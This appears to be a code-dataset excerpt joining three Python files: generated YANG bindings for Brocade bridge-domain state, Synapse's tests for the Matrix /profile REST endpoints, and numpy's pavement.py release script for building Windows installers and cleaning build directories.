            'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="description", rest_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='string', is_config=False)""",
        })
    self.__description = t
    # Fire the parent-notification hook when present.
    if hasattr(self, '_set'):
        self._set()


def _unset_description(self):
    # Reset the leaf to a fresh, empty instance of its generated type.
    self.__description = YANGDynClass(base=unicode, is_leaf=True, yang_name="description", rest_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='string', is_config=False)
def _get_outer_vlan_list(self):
    """
    Getter method for outer_vlan_list, mapped from YANG variable /bridge_domain_state/bridge_domain_list/outer_vlan_list (list)

    YANG Description: bd_vlan_tag_info
    """
    return self.__outer_vlan_list


def _set_outer_vlan_list(self, v, load=False):
    """
    Setter method for outer_vlan_list, mapped from YANG variable /bridge_domain_state/bridge_domain_list/outer_vlan_list (list)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_outer_vlan_list is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_outer_vlan_list() directly.

    YANG Description: bd_vlan_tag_info
    """
    # Unwrap pyangbind typed wrappers to their native value before re-validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # YANG list keyed on 'outer-vlan'; entries are outer_vlan_list containers.
        t = YANGDynClass(v,base=YANGListType("outer_vlan",outer_vlan_list.outer_vlan_list, yang_name="outer-vlan-list", rest_name="outer-vlan-list", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='outer-vlan', extensions={u'tailf-common': {u'callpoint': u'nsm-bd-vlan-tag-info', u'cli-suppress-show-path': None}}), is_container='list', yang_name="outer-vlan-list", rest_name="outer-vlan-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'nsm-bd-vlan-tag-info', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='list', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """outer_vlan_list must be of a type compatible with list""",
            'defined-type': "list",
            'generated-type': """YANGDynClass(base=YANGListType("outer_vlan",outer_vlan_list.outer_vlan_list, yang_name="outer-vlan-list", rest_name="outer-vlan-list", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='outer-vlan', extensions={u'tailf-common': {u'callpoint': u'nsm-bd-vlan-tag-info', u'cli-suppress-show-path': None}}), is_container='list', yang_name="outer-vlan-list", rest_name="outer-vlan-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'nsm-bd-vlan-tag-info', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='list', is_config=False)""",
        })
    self.__outer_vlan_list = t
    # Fire the parent-notification hook when present.
    if hasattr(self, '_set'):
        self._set()


def _unset_outer_vlan_list(self):
    # Reset the list to a fresh, empty instance of its generated type.
    self.__outer_vlan_list = YANGDynClass(base=YANGListType("outer_vlan",outer_vlan_list.outer_vlan_list, yang_name="outer-vlan-list", rest_name="outer-vlan-list", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='outer-vlan', extensions={u'tailf-common': {u'callpoint': u'nsm-bd-vlan-tag-info', u'cli-suppress-show-path': None}}), is_container='list', yang_name="outer-vlan-list", rest_name="outer-vlan-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'nsm-bd-vlan-tag-info', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='list', is_config=False)
# Public read-only property bindings: these operational-state leaves
# (config false) expose getters only; mutation happens via the private
# _set_* helpers, which pyangbind invokes during deserialisation.
bd_id = __builtin__.property(_get_bd_id)
vc_id = __builtin__.property(_get_vc_id)
active_ac_lif_count = __builtin__.property(_get_active_ac_lif_count)
config_ac_lif_count = __builtin__.property(_get_config_ac_lif_count)
active_vfi_lif_count = __builtin__.property(_get_active_vfi_lif_count)
config_vfi_lif_count = __builtin__.property(_get_config_vfi_lif_count)
local_switching = __builtin__.property(_get_local_switching)
block_bpdu = __builtin__.property(_get_block_bpdu)
bd_type = __builtin__.property(_get_bd_type)
ve_ifindex = __builtin__.property(_get_ve_ifindex)
ve_id = __builtin__.property(_get_ve_id)
pw_profile = __builtin__.property(_get_pw_profile)
mac_limit = __builtin__.property(_get_mac_limit)
statistics = __builtin__.property(_get_statistics)
mac_addr_withdrawal = __builtin__.property(_get_mac_addr_withdrawal)
mct_enabled = __builtin__.property(_get_mct_enabled)
description = __builtin__.property(_get_description)
outer_vlan_list = __builtin__.property(_get_outer_vlan_list)

# Registry of this container's child elements, used by pyangbind's
# iteration/serialisation machinery.
_pyangbind_elements = {'bd_id': bd_id, 'vc_id': vc_id, 'active_ac_lif_count': active_ac_lif_count, 'config_ac_lif_count': config_ac_lif_count, 'active_vfi_lif_count': active_vfi_lif_count, 'config_vfi_lif_count': config_vfi_lif_count, 'local_switching': local_switching, 'block_bpdu': block_bpdu, 'bd_type': bd_type, 've_ifindex': ve_ifindex, 've_id': ve_id, 'pw_profile': pw_profile, 'mac_limit': mac_limit, 'statistics': statistics, 'mac_addr_withdrawal': mac_addr_withdrawal, 'mct_enabled': mct_enabled, 'description': description, 'outer_vlan_list': outer_vlan_list, }
| 69.174185 | 796 | 0.748048 |
ace0a3c08d550ff1eae24ed0619cb447c074fc90 | 12,163 | py | Python | tests/rest/client/v1/test_profile.py | DRRDietrich/synapse | bc203c962f4c18bb41b0abf3d3e59957137d6530 | [
"Apache-2.0"
] | 1 | 2020-11-07T03:29:01.000Z | 2020-11-07T03:29:01.000Z | tests/rest/client/v1/test_profile.py | DRRDietrich/synapse | bc203c962f4c18bb41b0abf3d3e59957137d6530 | [
"Apache-2.0"
] | null | null | null | tests/rest/client/v1/test_profile.py | DRRDietrich/synapse | bc203c962f4c18bb41b0abf3d3e59957137d6530 | [
"Apache-2.0"
] | 1 | 2020-09-23T12:36:11.000Z | 2020-09-23T12:36:11.000Z | # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests REST events for /profile paths."""
import json
from mock import Mock
from twisted.internet import defer
import synapse.types
from synapse.api.errors import AuthError, SynapseError
from synapse.rest import admin
from synapse.rest.client.v1 import login, profile, room
from tests import unittest
from ....utils import MockHttpResource, setup_test_homeserver
# Matrix user ID used as the authenticated requester in the mock-handler tests.
myid = "@1234ABCD:test"
# Client-API prefix under which the profile servlets are mounted.
PATH_PREFIX = "/_matrix/client/r0"
class MockHandlerProfileTestCase(unittest.TestCase):
    """ Tests rest layer of profile management.

    The profile handler is replaced by a Mock, so these tests exercise only
    the REST servlet's request parsing / response shaping, not the handler.

    Todo: move these into ProfileTestCase
    """

    @defer.inlineCallbacks
    def setUp(self):
        self.mock_resource = MockHttpResource(prefix=PATH_PREFIX)
        # Strict spec so any unexpected handler call raises AttributeError.
        self.mock_handler = Mock(
            spec=[
                "get_displayname",
                "set_displayname",
                "get_avatar_url",
                "set_avatar_url",
                "check_profile_query_allowed",
            ]
        )

        # Default every handler method to a resolved Deferred; individual
        # tests override return_value/side_effect as needed.
        self.mock_handler.get_displayname.return_value = defer.succeed(Mock())
        self.mock_handler.set_displayname.return_value = defer.succeed(Mock())
        self.mock_handler.get_avatar_url.return_value = defer.succeed(Mock())
        self.mock_handler.set_avatar_url.return_value = defer.succeed(Mock())
        self.mock_handler.check_profile_query_allowed.return_value = defer.succeed(
            Mock()
        )

        hs = yield setup_test_homeserver(
            self.addCleanup,
            "test",
            http_client=None,
            resource_for_client=self.mock_resource,
            federation=Mock(),
            federation_client=Mock(),
            profile_handler=self.mock_handler,
        )

        # Bypass real auth: every request is attributed to `myid`.
        async def _get_user_by_req(request=None, allow_guest=False):
            return synapse.types.create_requester(myid)

        hs.get_auth().get_user_by_req = _get_user_by_req

        profile.register_servlets(hs, self.mock_resource)

    @defer.inlineCallbacks
    def test_get_my_name(self):
        # GET of one's own displayname returns the handler's value verbatim.
        mocked_get = self.mock_handler.get_displayname
        mocked_get.return_value = defer.succeed("Frank")

        (code, response) = yield self.mock_resource.trigger(
            "GET", "/profile/%s/displayname" % (myid), None
        )

        self.assertEquals(200, code)
        self.assertEquals({"displayname": "Frank"}, response)
        # The servlet must pass the target UserID (localpart) through.
        self.assertEquals(mocked_get.call_args[0][0].localpart, "1234ABCD")

    @defer.inlineCallbacks
    def test_set_my_name(self):
        mocked_set = self.mock_handler.set_displayname
        mocked_set.return_value = defer.succeed(())

        (code, response) = yield self.mock_resource.trigger(
            "PUT", "/profile/%s/displayname" % (myid), b'{"displayname": "Frank Jr."}'
        )

        self.assertEquals(200, code)
        # Handler receives (target user, requester, new displayname).
        self.assertEquals(mocked_set.call_args[0][0].localpart, "1234ABCD")
        self.assertEquals(mocked_set.call_args[0][1].user.localpart, "1234ABCD")
        self.assertEquals(mocked_set.call_args[0][2], "Frank Jr.")

    @defer.inlineCallbacks
    def test_set_my_name_noauth(self):
        # Handler raising AuthError must surface as a 4xx response.
        mocked_set = self.mock_handler.set_displayname
        mocked_set.side_effect = AuthError(400, "message")

        (code, response) = yield self.mock_resource.trigger(
            "PUT",
            "/profile/%s/displayname" % ("@4567:test"),
            b'{"displayname": "Frank Jr."}',
        )

        # NOTE(review): the failure message is misleading — it is shown when
        # the code is NOT in the 4xx range. Also `< 499` here vs `<= 499` in
        # test_set_other_name is inconsistent.
        self.assertTrue(400 <= code < 499, msg="code %d is in the 4xx range" % (code))

    @defer.inlineCallbacks
    def test_get_other_name(self):
        # Remote (other-server) profiles are fetched the same way.
        mocked_get = self.mock_handler.get_displayname
        mocked_get.return_value = defer.succeed("Bob")

        (code, response) = yield self.mock_resource.trigger(
            "GET", "/profile/%s/displayname" % ("@opaque:elsewhere"), None
        )

        self.assertEquals(200, code)
        self.assertEquals({"displayname": "Bob"}, response)

    @defer.inlineCallbacks
    def test_set_other_name(self):
        # Setting someone else's displayname is rejected by the handler.
        mocked_set = self.mock_handler.set_displayname
        mocked_set.side_effect = SynapseError(400, "message")

        (code, response) = yield self.mock_resource.trigger(
            "PUT",
            "/profile/%s/displayname" % ("@opaque:elsewhere"),
            b'{"displayname":"bob"}',
        )

        # NOTE(review): same misleading msg text as test_set_my_name_noauth.
        self.assertTrue(400 <= code <= 499, msg="code %d is in the 4xx range" % (code))

    @defer.inlineCallbacks
    def test_get_my_avatar(self):
        mocked_get = self.mock_handler.get_avatar_url
        mocked_get.return_value = defer.succeed("http://my.server/me.png")

        (code, response) = yield self.mock_resource.trigger(
            "GET", "/profile/%s/avatar_url" % (myid), None
        )

        self.assertEquals(200, code)
        self.assertEquals({"avatar_url": "http://my.server/me.png"}, response)
        self.assertEquals(mocked_get.call_args[0][0].localpart, "1234ABCD")

    @defer.inlineCallbacks
    def test_set_my_avatar(self):
        mocked_set = self.mock_handler.set_avatar_url
        mocked_set.return_value = defer.succeed(())

        (code, response) = yield self.mock_resource.trigger(
            "PUT",
            "/profile/%s/avatar_url" % (myid),
            b'{"avatar_url": "http://my.server/pic.gif"}',
        )

        self.assertEquals(200, code)
        # Handler receives (target user, requester, new avatar URL).
        self.assertEquals(mocked_set.call_args[0][0].localpart, "1234ABCD")
        self.assertEquals(mocked_set.call_args[0][1].user.localpart, "1234ABCD")
        self.assertEquals(mocked_set.call_args[0][2], "http://my.server/pic.gif")
class ProfileTestCase(unittest.HomeserverTestCase):
    """End-to-end tests for the displayname endpoints of /profile.

    Unlike MockHandlerProfileTestCase these run against a real (test)
    homeserver with a registered user, so the full handler path is covered.
    """

    servlets = [
        admin.register_servlets_for_client_rest_resource,
        login.register_servlets,
        profile.register_servlets,
    ]

    def make_homeserver(self, reactor, clock):
        # Plain test homeserver with default config.
        self.hs = self.setup_test_homeserver()
        return self.hs

    def prepare(self, reactor, clock, hs):
        # A registered user whose profile the tests operate on.
        self.owner = self.register_user("owner", "pass")
        self.owner_tok = self.login("owner", "pass")

    def test_set_displayname(self):
        """Setting one's own displayname succeeds and is readable back."""
        url = "/profile/%s/displayname" % (self.owner,)
        body = json.dumps({"displayname": "test"})
        req, chan = self.make_request(
            "PUT", url, content=body, access_token=self.owner_tok
        )
        self.render(req)
        self.assertEqual(chan.code, 200, chan.result)

        self.assertEqual(self.get_displayname(), "test")

    def test_set_displayname_too_long(self):
        """Attempts to set a stupid displayname should get a 400"""
        url = "/profile/%s/displayname" % (self.owner,)
        body = json.dumps({"displayname": "test" * 100})
        req, chan = self.make_request(
            "PUT", url, content=body, access_token=self.owner_tok
        )
        self.render(req)
        self.assertEqual(chan.code, 400, chan.result)

        # The over-long name must not have been stored.
        self.assertEqual(self.get_displayname(), "owner")

    def get_displayname(self):
        """Fetch the owner's current displayname, asserting a 200 response."""
        req, chan = self.make_request(
            "GET", "/profile/%s/displayname" % (self.owner,)
        )
        self.render(req)
        self.assertEqual(chan.code, 200, chan.result)
        return chan.json_body["displayname"]
class ProfilesRestrictedTestCase(unittest.HomeserverTestCase):
    """Profile lookups when auth is required and requester/target must share a room."""

    servlets = [
        admin.register_servlets_for_client_rest_resource,
        login.register_servlets,
        profile.register_servlets,
        room.register_servlets,
    ]

    def make_homeserver(self, reactor, clock):
        hs_config = self.default_config()
        hs_config["require_auth_for_profile_requests"] = True
        hs_config["limit_profile_requests_to_users_who_share_rooms"] = True
        self.hs = self.setup_test_homeserver(config=hs_config)
        return self.hs

    def prepare(self, reactor, clock, hs):
        # User owning the requested profile.
        self.owner = self.register_user("owner", "pass")
        self.owner_tok = self.login("owner", "pass")
        self.profile_url = "/profile/%s" % (self.owner)
        # User requesting the profile.
        self.requester = self.register_user("requester", "pass")
        self.requester_tok = self.login("requester", "pass")
        self.room_id = self.helper.create_room_as(self.owner, tok=self.owner_tok)

    def test_no_auth(self):
        self.try_fetch_profile(401)

    def test_not_in_shared_room(self):
        self.ensure_requester_left_room()
        self.try_fetch_profile(403, access_token=self.requester_tok)

    def test_in_shared_room(self):
        self.ensure_requester_left_room()
        self.helper.join(room=self.room_id, user=self.requester, tok=self.requester_tok)
        self.try_fetch_profile(200, self.requester_tok)

    def try_fetch_profile(self, expected_code, access_token=None):
        # Exercise the profile endpoint and both of its sub-endpoints.
        for suffix in ("", "/displayname", "/avatar_url"):
            self.request_profile(
                expected_code, url_suffix=suffix, access_token=access_token
            )

    def request_profile(self, expected_code, url_suffix="", access_token=None):
        req, chan = self.make_request(
            "GET", self.profile_url + url_suffix, access_token=access_token
        )
        self.render(req)
        self.assertEqual(chan.code, expected_code, chan.result)

    def ensure_requester_left_room(self):
        try:
            self.helper.leave(
                room=self.room_id, user=self.requester, tok=self.requester_tok
            )
        except AssertionError:
            # We don't care whether the leave request didn't return a 200 (e.g.
            # if the user isn't already in the room), because we only want to
            # make sure the user isn't in the room.
            pass
class OwnProfileUnrestrictedTestCase(unittest.HomeserverTestCase):
    """A user can always look up their own profile, even with auth/room
    restrictions enabled."""

    servlets = [
        admin.register_servlets_for_client_rest_resource,
        login.register_servlets,
        profile.register_servlets,
    ]

    def make_homeserver(self, reactor, clock):
        hs_config = self.default_config()
        hs_config["require_auth_for_profile_requests"] = True
        hs_config["limit_profile_requests_to_users_who_share_rooms"] = True
        self.hs = self.setup_test_homeserver(config=hs_config)
        return self.hs

    def prepare(self, reactor, clock, hs):
        # User requesting the profile.
        self.requester = self.register_user("requester", "pass")
        self.requester_tok = self.login("requester", "pass")

    def test_can_lookup_own_profile(self):
        """Tests that a user can lookup their own profile without having to be in a room
        if 'require_auth_for_profile_requests' is set to true in the server's config.
        """
        # Same three requests as before: full profile, displayname, avatar_url.
        for suffix in ("", "/displayname", "/avatar_url"):
            request, channel = self.make_request(
                "GET",
                "/profile/" + self.requester + suffix,
                access_token=self.requester_tok,
            )
            self.render(request)
            self.assertEqual(channel.code, 200, channel.result)
| 34.951149 | 88 | 0.649593 |
ace0a5c022fc41425dbd682f1ebb7277ab48afbc | 21,826 | py | Python | pavement.py | Dapid/numpy | aa824670cf6ad21c2f921856ba4eec00781347fe | [
"BSD-3-Clause"
] | null | null | null | pavement.py | Dapid/numpy | aa824670cf6ad21c2f921856ba4eec00781347fe | [
"BSD-3-Clause"
] | null | null | null | pavement.py | Dapid/numpy | aa824670cf6ad21c2f921856ba4eec00781347fe | [
"BSD-3-Clause"
] | null | null | null | """
This paver file is intented to help with the release process as much as
possible. It relies on virtualenv to generate 'bootstrap' environments as
independent from the user system as possible (e.g. to make sure the sphinx doc
is built against the built numpy, not an installed one).
Building a fancy dmg from scratch
=================================
Clone the numpy-macosx-installer git repo from on github into the source tree
(numpy-macosx-installer should be in the same directory as setup.py). Then, do
as follows::
git clone git://github.com/cournape/macosx-numpy-installer
# remove build dir, and everything generated by previous paver calls
# (included generated installers). Use with care !
paver nuke
paver bootstrap && source bootstrap/bin/activate
# Installing numpy is necessary to build the correct documentation (because
# of autodoc)
python setup.py install
paver dmg
Building a simple (no-superpack) windows installer from wine
============================================================
It assumes that blas/lapack are in c:\local\lib inside drive_c.
paver bdist_wininst_simple
You will have to configure your wine python locations (WINE_PYS).
The superpack requires all the atlas libraries for every arch to be installed
(see SITECFG), and can then be built as follows::
paver bdist_superpack
Building changelog + notes
==========================
Assumes you have git and the binaries/tarballs in installers/::
paver write_release
paver write_note
This automatically put the checksum into NOTES.txt, and write the Changelog
which can be uploaded to sourceforge.
TODO
====
- the script is messy, lots of global variables
- make it more easily customizable (through command line args)
- missing targets: install & test, sdist test, debian packaging
- fix bdist_mpkg: we build the same source twice -> how to make sure we use
the same underlying python for egg install in venv and for bdist_mpkg
"""
from __future__ import division, print_function
# What need to be installed to build everything on mac os x:
# - wine: python 2.6 and 2.5 + makensis + cpuid plugin + mingw, all in the PATH
# - paver + virtualenv
# - full texlive
import os
import sys
import shutil
import subprocess
import re
try:
from hashlib import md5
from hashlib import sha256
except ImportError:
from md5 import md5
import paver
from paver.easy import \
options, Bunch, task, call_task, sh, needs, cmdopts, dry
# Derive FULLVERSION / GIT_REVISION by importing the adjacent setup.py;
# this directory is prepended to sys.path for the import and popped again
# afterwards.  Dev builds get a '.dev0+<sha7>' suffix.
sys.path.insert(0, os.path.dirname(__file__))
try:
    setup_py = __import__("setup")
    FULLVERSION = setup_py.VERSION
    # This is duplicated from setup.py
    if os.path.exists('.git'):
        GIT_REVISION = setup_py.git_version()
    elif os.path.exists('numpy/version.py'):
        # must be a source distribution, use existing version file
        from numpy.version import git_revision as GIT_REVISION
    else:
        GIT_REVISION = "Unknown"
    if not setup_py.ISRELEASED:
        FULLVERSION += '.dev0+' + GIT_REVISION[:7]
finally:
    # Always restore sys.path, even when the setup import fails.
    sys.path.pop(0)
#-----------------------------------
# Things to be changed for a release
#-----------------------------------
# Source of the release notes
RELEASE_NOTES = 'doc/release/1.11.0-notes.rst'
# Start/end of the log (from git)
LOG_START = 'v1.10.0b1'
LOG_END = 'master'
#-------------------------------------------------------
# Hardcoded build/install dirs, virtualenv options, etc.
#-------------------------------------------------------
# Python version used by the single-version tasks (dmg, bdist_wininst_simple).
DEFAULT_PYTHON = "2.7"
# Where to put the final installers, as put on sourceforge
SUPERPACK_BUILD = 'build-superpack'
SUPERPACK_BINDIR = os.path.join(SUPERPACK_BUILD, 'binaries')
# Global paver option bunches consumed by the tasks below.
options(bootstrap=Bunch(bootstrap_dir="bootstrap"),
        virtualenv=Bunch(packages_to_install=["sphinx==1.1.3", "numpydoc"],
                         no_site_packages=False),
        sphinx=Bunch(builddir="build", sourcedir="source", docroot='doc'),
        superpack=Bunch(builddir="build-superpack"),
        installers=Bunch(releasedir="release",
                         installersdir=os.path.join("release", "installers")),
        doc=Bunch(doc_root="doc",
                  sdir=os.path.join("doc", "source"),
                  bdir=os.path.join("doc", "build"),
                  bdir_latex=os.path.join("doc", "build", "latex"),
                  destdir_pdf=os.path.join("build_doc", "pdf")
                  ),
        html=Bunch(builddir=os.path.join("build", "html")),
        dmg=Bunch(python_version=DEFAULT_PYTHON),
        bdist_wininst_simple=Bunch(python_version=DEFAULT_PYTHON),
        )
# python.org framework interpreters used for the OS X mpkg builds.
MPKG_PYTHON = {
    "2.6": ["/Library/Frameworks/Python.framework/Versions/2.6/bin/python"],
    "2.7": ["/Library/Frameworks/Python.framework/Versions/2.7/bin/python"],
    "3.2": ["/Library/Frameworks/Python.framework/Versions/3.2/bin/python3"],
    "3.3": ["/Library/Frameworks/Python.framework/Versions/3.3/bin/python3"],
    "3.4": ["/Library/Frameworks/Python.framework/Versions/3.4/bin/python3"],
}
# Per-architecture ATLAS/BLAS/LAPACK locations for the Windows superpack builds.
SSE3_CFG = {'ATLAS': r'C:\local\lib\atlas\sse3'}
SSE2_CFG = {'ATLAS': r'C:\local\lib\atlas\sse2'}
NOSSE_CFG = {'BLAS': r'C:\local\lib\atlas\nosse', 'LAPACK': r'C:\local\lib\atlas\nosse'}
SITECFG = {"sse2" : SSE2_CFG, "sse3" : SSE3_CFG, "nosse" : NOSSE_CFG}
# Windows interpreter locations: run through wine except on native win32.
if sys.platform =="darwin":
    WINDOWS_PYTHON = {
        "3.4": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python34/python.exe"],
        "3.3": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python33/python.exe"],
        "3.2": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python32/python.exe"],
        "2.7": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python27/python.exe"],
        "2.6": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python26/python.exe"],
    }
    WINDOWS_ENV = os.environ
    WINDOWS_ENV["DYLD_FALLBACK_LIBRARY_PATH"] = "/usr/X11/lib:/usr/lib"
    MAKENSIS = ["wine", "makensis"]
elif sys.platform == "win32":
    WINDOWS_PYTHON = {
        "3.4": ["C:\Python34\python.exe"],
        "3.3": ["C:\Python33\python.exe"],
        "3.2": ["C:\Python32\python.exe"],
        "2.7": ["C:\Python27\python.exe"],
        "2.6": ["C:\Python26\python.exe"],
    }
    # XXX: find out which env variable is necessary to avoid the pb with python
    # 2.6 and random module when importing tempfile
    WINDOWS_ENV = os.environ
    MAKENSIS = ["makensis"]
else:
    WINDOWS_PYTHON = {
        "3.4": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python34/python.exe"],
        "3.3": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python33/python.exe"],
        "3.2": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python32/python.exe"],
        "2.7": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python27/python.exe"],
        "2.6": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python26/python.exe"],
    }
    WINDOWS_ENV = os.environ
    MAKENSIS = ["wine", "makensis"]
def superpack_name(pyver, numver):
    """Return the filename of the superpack installer for the given
    Python and numpy versions."""
    return "numpy-{0}-win32-superpack-python{1}.exe".format(numver, pyver)
def internal_wininst_name(arch):
    """Return the name of the wininst as it will appear inside the superpack,
    i.e. with the architecture encoded in the file name."""
    extension = '.exe'
    return "numpy-{0}-{1}{2}".format(FULLVERSION, arch, extension)
def wininst_name(pyver):
    """Return the name of the installer built by the wininst command."""
    extension = '.exe'
    return "numpy-{0}.win32-py{1}{2}".format(FULLVERSION, pyver, extension)
def prepare_nsis_script(pyver, numver):
    """Instantiate the NSIS superinstaller template into the superpack
    build directory.

    Fills in the installer name and the per-architecture wininst binary
    names.  Uses context managers so both file handles are closed (the
    original leaked both, so the target might not be flushed before
    makensis reads it).
    """
    if not os.path.exists(SUPERPACK_BUILD):
        os.makedirs(SUPERPACK_BUILD)
    tpl = os.path.join('tools/win32build/nsis_scripts', 'numpy-superinstaller.nsi.in')
    with open(tpl, 'r') as source:
        cnt = source.read()
    cnt = cnt.replace('@NUMPY_INSTALLER_NAME@', superpack_name(pyver, numver))
    for arch in ['nosse', 'sse2', 'sse3']:
        cnt = cnt.replace('@%s_BINARY@' % arch.upper(),
                          internal_wininst_name(arch))
    with open(os.path.join(SUPERPACK_BUILD, 'numpy-superinstaller.nsi'), 'w') as target:
        target.write(cnt)
def bdist_wininst_arch(pyver, arch):
    """Arch-specific wininst build: wipe any stale build tree, then build
    with the site configuration matching `arch`."""
    build_dir = "build"
    if os.path.exists(build_dir):
        shutil.rmtree(build_dir)
    _bdist_wininst(pyver, SITECFG[arch])
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_superpack(options):
    """Build all arch specific wininst installers.

    Builds the nosse/sse2/sse3 wininst installers, bundles them with the
    NSIS superinstaller script, and copies the resulting superpack into
    the installers directory.
    """
    pyver = options.python_version
    def copy_bdist(arch):
        # Copy the wininst in dist into the release directory
        source = os.path.join('dist', wininst_name(pyver))
        target = os.path.join(SUPERPACK_BINDIR, internal_wininst_name(arch))
        if os.path.exists(target):
            os.remove(target)
        if not os.path.exists(os.path.dirname(target)):
            os.makedirs(os.path.dirname(target))
        try:
            os.rename(source, target)
        except OSError:
            # When git is installed on OS X but not under Wine, the name of the
            # .exe has "-Unknown" in it instead of the correct git revision.
            # Try to fix this here:
            revidx = source.index(".dev-") + 5
            gitrev = source[revidx:revidx+7]
            os.rename(source.replace(gitrev, "Unknown"), target)
    # Build and stage each architecture in turn.
    bdist_wininst_arch(pyver, 'nosse')
    copy_bdist("nosse")
    bdist_wininst_arch(pyver, 'sse2')
    copy_bdist("sse2")
    bdist_wininst_arch(pyver, 'sse3')
    copy_bdist("sse3")
    idirs = options.installers.installersdir
    pyver = options.python_version
    # Generate the NSIS script and run makensis (under wine off-Windows).
    prepare_nsis_script(pyver, FULLVERSION)
    subprocess.check_call(MAKENSIS + ['numpy-superinstaller.nsi'],
                          cwd=SUPERPACK_BUILD)
    # Copy the superpack into installers dir
    if not os.path.exists(idirs):
        os.makedirs(idirs)
    source = os.path.join(SUPERPACK_BUILD, superpack_name(pyver, FULLVERSION))
    target = os.path.join(idirs, superpack_name(pyver, FULLVERSION))
    shutil.copy(source, target)
# Convenience tasks: one per target architecture, all delegating to
# bdist_wininst_arch above.
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_wininst_nosse(options):
    """Build the nosse wininst installer."""
    bdist_wininst_arch(options.python_version, 'nosse')
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_wininst_sse2(options):
    """Build the sse2 wininst installer."""
    bdist_wininst_arch(options.python_version, 'sse2')
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_wininst_sse3(options):
    """Build the sse3 wininst installer."""
    bdist_wininst_arch(options.python_version, 'sse3')
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_wininst_simple():
    """Simple wininst-based installer."""
    # NOTE(review): unlike the other tasks this one takes no `options`
    # parameter and reads the global paver `options` bunch instead —
    # confirm paver still routes the cmdopt into
    # options.bdist_wininst_simple before changing this.
    pyver = options.bdist_wininst_simple.python_version
    _bdist_wininst(pyver)
def _bdist_wininst(pyver, cfg_env=None):
    """Run ``setup.py build -c mingw32 bdist_wininst`` under the Windows
    Python for `pyver`.

    Parameters
    ----------
    pyver : str
        Key into WINDOWS_PYTHON selecting the interpreter to run.
    cfg_env : dict or None
        Extra environment entries (e.g. ATLAS/BLAS/LAPACK paths).  The
        process environment (WINDOWS_ENV) is layered on top, exactly as
        before, but on a *copy*: previously the caller's dict — the shared
        module-level SITECFG dicts — was mutated in place and polluted
        with the whole environment on first use.
    """
    cmd = WINDOWS_PYTHON[pyver] + ['setup.py', 'build', '-c', 'mingw32', 'bdist_wininst']
    if cfg_env:
        # Same precedence as the original (WINDOWS_ENV wins on conflicts).
        env = dict(cfg_env)
        env.update(WINDOWS_ENV)
    else:
        env = WINDOWS_ENV
    subprocess.check_call(cmd, env=env)
#----------------
# Bootstrap stuff
#----------------
@task
def bootstrap(options):
    """create virtualenv in ./bootstrap"""
    try:
        import virtualenv
    except ImportError as e:
        raise RuntimeError("virtualenv is needed for bootstrap")
    bdir = options.bootstrap_dir
    if not os.path.exists(bdir):
        os.makedirs(bdir)
    # NOTE(review): "boostrap.py" (sic) is spelled consistently with the
    # sh() call below, so the typo is harmless — confirm before renaming.
    bscript = "boostrap.py"
    options.virtualenv.script_name = os.path.join(options.bootstrap_dir,
                                                  bscript)
    options.virtualenv.no_site_packages = False
    options.bootstrap.no_site_packages = False
    # Let paver generate the virtualenv bootstrap script, then execute it
    # with the current interpreter.
    call_task('paver.virtual.bootstrap')
    sh('cd %s; %s %s' % (bdir, sys.executable, bscript))
@task
def clean():
    """Remove build, dist, egg-info garbage."""
    for stale in ('build', 'dist', 'numpy.egg-info'):
        if os.path.exists(stale):
            shutil.rmtree(stale)
    # Also drop the sphinx build tree.
    sphinx_build = os.path.join('doc', options.sphinx.builddir)
    if os.path.exists(sphinx_build):
        shutil.rmtree(sphinx_build)
@task
def clean_bootstrap():
    """Remove the virtualenv bootstrap directory."""
    target = os.path.join(options.bootstrap.bootstrap_dir)
    if os.path.exists(target):
        shutil.rmtree(target)
@task
@needs('clean', 'clean_bootstrap')
def nuke(options):
    """Remove everything: build dir, installers, bootstrap dirs, etc..."""
